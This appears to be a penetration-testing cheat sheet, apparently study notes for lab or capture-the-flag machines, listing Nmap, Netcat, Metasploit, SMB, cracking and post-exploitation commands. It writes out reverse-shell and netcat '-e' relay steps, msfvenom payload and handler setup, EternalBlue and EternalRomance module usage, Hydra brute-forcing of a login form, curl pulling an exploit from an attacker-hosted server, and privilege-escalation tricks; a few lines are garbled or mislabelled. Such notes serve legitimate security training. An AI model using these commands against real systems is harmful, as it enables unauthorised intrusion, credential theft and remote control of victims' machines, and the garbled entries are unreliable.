Nmap, Netcat, and Metasploit Commands Cheat Sheet
Classified in Computers
Written at on 
English with a size of 7.67 KB.
Nmap Options
-PE: Quickly check if host is up.
-sn: Disable port scanning (host discovery).
-n: Disables DNS resolution (checks IP online without looking up hostnames).
-O: OS detection.
-A: OS detection, Version detection, Script scanning, traceroute.
-sV: Service detection (banner info, version).
-vV: Provides verbose output.
-sC: Scan with default scripts for additional info gathering.
--min-rate=5000: Ensures scan sends at least 5k packets per second.
nmap --script smb-enum-shares.nse -p 445 (ip): List shares and their properties.
To see scripts starting with X: ls /path/X
To execute script with script tracing: sudo nmap -script=smb-os-discovery -script-trace target_ip
To enumerate the SMB share files: sudo nmap -script=smb-enum-shares target_ip
Vulnerability scanning on port 445: sudo nmap -script=smb-vuln-* -p 445 target_ip
Netcat Commands
nc -z site.com: Port scan of specified website or server.
nc -l: Instruct local system to listen for TCP connections & UDP activity on specified port number.
nc site.com 1234 < file_name: Initiate transfer of a file based on specified port number.
Printf: Save HTML code and publish it through local server.
-u: UDP, -v: verbose, -p: specify port, -D: turn off full debug mode, -n: skip DNS lookups.
-nv (ip) (port): Remote shell approach.
nc -l -p [port] -e relay.bat: Connect to relay.
> filename.out: to output into a file, < filename.in: receive a file in.
echo "" | nc -zv -wl [host] [port range]: Obtain the TCP banners for a range of ports.
PHP Reverse Shell
For reverse shell with PHP:
- Download PHP reverse shell and put in share.
- Set up listener
nc -lvp 4444. - Access web page with PHP stuff at the end
?stuff.
SSH, DNS, and File Transfer
SSH login: ssh (username)@(target IP)
DNS lookup: dig axfr (target domain) @(target IP)
scp (file) <userid>@<victim IP address>:/home/friend: Transfer file to the machine to the "friend" account.
chmod +x file: To change the file permissions to make it executable.
SMB Client
(If Nmap says something about SMB):
Listing Shares: smbclient -L (ip address)
Connecting to Share: smbclient //(ip)/(share) -U (username)
Enumerates SMB shares and info on target Windows system: enum4linux -S (target IP)
Enumerates SMB shares and their permissions: crackmapexec smb 10.129.250.241 -u '' -p '' --shares
RDP Exploit: xfreerdp /u:<userid> /p:<password> /v:<IP Address>
Password Cracking
John the Ripper: john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha256 (file)
Hydra: sudo hydra -l (username) -P /usr/share/wordlists/rockyou.txt (target IP) https-post-form "/:username=admin&password=^PASS^:Wrong Credentials"
https-post-form: Specifies target form for brute-forcing.
Directory Scanning
(May have to add directories to /etc/config file first)
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://[IP]/FUZZ
gobuster dir -u (target address) -x (extension) -w /usr/share/wordlists/dirb/common.txt -t 50
feroxbuster -url (target IP)
Hosting and Transferring Exploits
Hosting a HTTP server to bring exploits over: python3 -m http.server 8000
Bringing exploit over to a shell: curl http://10.10.14.15:8080/(exploit) -o C:\(path to desktop)
Metasploit
Creating Payload
msfvenom -p [PAYLOAD] lhost=[LHOST] lport=[LPORT] -f [FORMAT] -o [FILENAME].exe
Setting up Listener
msfconsole ; use exploit/multi/handler ; set payload (operating system)/(system type(x64/x86)/meterpreter/reverse_tcp ; set LPORT (lport number) ; set LHOST (listening IP/attacker) ; run
Suggests potential exploits: use exploit suggester
EternalRomance
(Requires SMB user and pass unlike EternalBlue):
msfconsole ; search the exploit ; use 0 (windows/smb/ms17_010_psexec) ; set RHOST (victim IP) ; set LPORT (lport number) ; set LHOST (listening IP/attacker) ; set SMBPass (Password) ; Set SMBUser (Username) ; getuid: NT AUTHORITY\SYSTEM
EternalBlue
(Requires SMB user and pass unlike EternalBlue)
msfconsole ; use windows/smb/ms17_010_eternalblue ; set RHOST (victim IP) ; set LPORT (lport number) ; set LHOST (listening IP/attacker)
winPEAS enumeration (Look for red herrings): https://github.com/peass-ng/PEASS-ng/releases/tag/20250202-a3a1123d
Post Exploitation
Full TTY Shell
Spawns better interactive shell: python3 -c 'import pty; pty.spawn("/bin/bash")'
Restores terminal behaviour for better control: stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
Searches for SUID binaries, can be exploited for privilege escalation: find / -perm /6000 2>/dev/null
Evil-WinRM (Connects to Windows machine using Windows Remote Management): evil–winrm -S -i -u [username] -p [password]
CrackMapExec: For enumerating and attacking Windows network
Database Enumeration
MySQL
mysql -u username -p ; show databases; select * from tables; show tables; show create table [x]; (Reveals table schema)
MongoDB
db.getCollection(‘flag’).find(): Retrieve data from “Flag” collection
db.getCollection(‘ecommerceWebapp’).find({‘id’:2}): Queries “ecommerceWebapp” collection for specific entry
db.ecommerceWebapp.getIndexes(); = Lists indexes in collection
Security Checks
Steven Goh’s book of hiding tricks: (Windows)
View PowerShell history: $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Common security checks: wsl installation, public user, guest user, SMB shares, FTP anonymous login
(Linux): Check home directories, webapp configs, SUID binaries, mail, Git repositories and uncommon services and open ports
Lists allowed commands for user: (Potential privilege escalation) sudo -l (with password) ; 7z x (filename) -p(Password)
Shell Commands
groups = See which groups user part of
cat = Write out the contents
pwd = Check current path
docker images = Check info about dockers
docker run -it --privileged --rm peeps-web /bin/bash = Docker image privilege escalation
Miscellaneous
Base64 Decoding: base64 -d [string] or echo -e 'string' | base64 -d; echo;
Get-Acl -Path C:/inetpub | Format-Table -Wrap